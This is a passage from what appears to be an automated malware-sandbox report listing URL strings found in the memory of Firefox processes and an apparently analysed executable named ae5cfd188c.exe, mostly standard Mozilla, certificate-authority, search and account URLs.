                          Source: firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889827871.000034BEA5600000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.o
                          Source: firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.oZ
                          Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B765000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2823349895.000002BA5A121000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org
                          Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2791036324.0000028E95004000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2791036324.0000028E95081000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889827871.000034BEA5600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/additionalProperties
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/aboutWelcomeBehavior
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/aboutWelcomeBehaviorhttp://mozilla.org/#/properties/dnsMaxAnyPriorit
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThreshold
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabledhttp://mozilla.org/#/properties/experimentType
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value/ad
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/itemsresource://gre/modul
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/ratio
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/ad
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/itemsbrowser.newtabpage.a
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/ratio
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/ratiohttp://mozilla.org/#/properti
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/slug
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/dnsMaxAnyPriorityThreads
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/dnsMaxPriorityThreads
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/dnsMaxPriorityThreadsgetAPI/register/
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/ehPreconnectEnabled
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/exposureResults
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/featureValidationOptOut
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties/additionalProperties
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0http://mozilla.org/#/properties/featureValidati
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/1
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/1shutting
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/mdnFeatureGate
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/merinoEnabled
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/merinoProviders
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/merinoTimeoutMs
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/migrateExtensions
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsNonSponsoredEnabled
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
                          Source: firefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/showPreferencesEntrypoint
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
                          Source: firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/.
                          Source: firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/0
                          Source: firefox.exe, 00000018.00000003.2764877976.000002BA5AD61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2832106353.000002BA5ABDB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2668232033.000002BA5ABCF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2766500542.000002BA5B07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2740167016.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2845824654.000002BA5BD86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2842712823.000002BA5B9B6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2842712823.000002BA5B931000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885018488.000002BD0003F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2837480713.000002BA5ADF5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2837480713.000002BA5ADEA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2739033143.000002BA5C4BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA637D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2844309945.000002BA5BC8D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2845824654.000002BA5BD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2857928108.000002BA5D0C6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2874426589.000002BA61B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2857928108.000002BA5D00F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2832106353.000002BA5AB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2767071304.000002BA5ADDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2739033143.000002BA5C4E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/MPL/2.0/.
                          Source: firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889827871.000034BEA5600000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/U
                          Source: firefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/Z
                          Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                          Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                          Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2797233592.000002BA55A7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
                          Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2797233592.000002BA55A7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://e.mail.ru/c
                          Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C5C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C0DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2818447104.000002BA59D47000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2847205509.000002BA5BE43000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2818447104.000002BA59D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2740204931.000002BA5A4BB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C63000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59669000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2827730700.000002BA5A4BB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55EA6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2827730700.000002BA5A44A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55EAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2843439668.000002BA5BB90000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2737097313.000002BA61CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2847205509.000002BA5BE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2875505657.000002BA61CAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2731037127.000002BA5C0DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/search
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/firefox-view-tabs-s
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://devtools/shared/security/Dev
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/TelemetryTimesta
                          Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61AC0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2852168506.000002BA5C4BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                          Source: ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61AC0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2852168506.000002BA5C4BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
                          Source: firefox.exe, 00000018.00000002.2852168506.000002BA5C4A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
                          Source: firefox.exe, 00000018.00000003.2659017231.000002BA5991F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2878984131.000002BA61F57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/_acquireAutoScrollWakeLock
                          Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: firefox.exe, 00000018.00000003.2737226174.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2854854049.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2728347300.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com/
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com/settings/clients
                          Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.firefox.comK
                          Source: firefox.exe, 00000018.00000002.2793027167.000002BA4B4BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.g
                          Source: firefox.exe, 00000018.00000002.2870614524.000002BA61967000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2787277792.000000D7F87D8000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2847205509.000002BA5BE9E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2860458807.000002BA5D10B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
                          Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CE1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
                          Source: firefox.exe, 00000018.00000002.2839565999.000002BA5B5FD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B710000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B75A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B580000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841657939.000002BA5B852000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ads.stickyadstv.com/firefox-etp
                          Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
                          Source: firefox.exe, 00000018.00000002.2886166420.0000180E51A04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://amazon.com
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://api.accounts.firefox.com/v1
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
